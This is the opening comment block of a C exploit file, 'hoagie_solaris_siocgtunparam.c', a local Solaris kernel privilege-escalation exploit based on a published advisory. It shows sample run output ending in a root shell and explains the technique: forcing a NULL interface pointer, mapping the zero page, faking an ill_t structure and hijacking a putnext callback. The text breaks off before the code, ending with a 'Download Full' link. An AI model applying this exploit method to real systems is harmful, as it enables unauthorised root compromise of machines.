/***********************************************************
* hoagie_solaris_siocgtunparam.c |
* LOCAL SOLARIS KERNEL ROOT EXPLOIT (<> |
* |
* Bug reported by Tobias Klein |
* http://www.trapkit.de/advisories/TKADV2008-015.txt |
* Exploit by: peri.carding (http://www.void.at/main/) |
* |
* $ ./hoagie_solaris_siocgtunparam |
* hoagie_solaris_siocgtunparam.c - solaris root < <> |
* -andi / void.at |
* |
* [*] socket created |
* [*] mapping zero page successful |
* [*] process cred address: 0xd3853894 |
* [*] prepare null page |
* [*] clean up write queue |
* # uname -a |
* SunOS unknown 5.10 Generic_118844-26 i86pc i386 i86pc |
* # id |
* uid=0(root) gid=0(root) |
* # |
* |
* First of all we have to make sure that ip_extract_tunreq() will |
* return 0 and ipifp is still set to NULL. This can be achieved by |
* using an interface alias starting with zero. (the interface ip.tun0 |
* must not exist because ipif_lookup_on_name() will "fail" to get |
* null page) |
* |
* ip_if.c / ipif_lookup_on_name() |
* ... |
* if (&cp[2] <> |
* return (NULL); |
* ... |
* |
* In ip_sioctl_tunparam() ipif->ipif_ill is used for mutex enter |
* so we have to set the offet for an ill_t structure. Later putnext() |
* will be called with a queue (see ill_t). We can use this queue to |
* add a custom callback function that is used by putnext(). |
* |
* ip_if.c / ip_sioctl_tunparam(): |
* ... |
* ill = ipif->ipif_ill; |
* mutex_enter(&connp->conn_lock); |
* mutex_enter(&ill->ill_lock); |
* ... |
* if (success) { |
* ip1dbg(("sending down tunparam request ")); |
* putnext(ill->ill_wq, mp1); |
* return (EINPROGRESS);
Download Full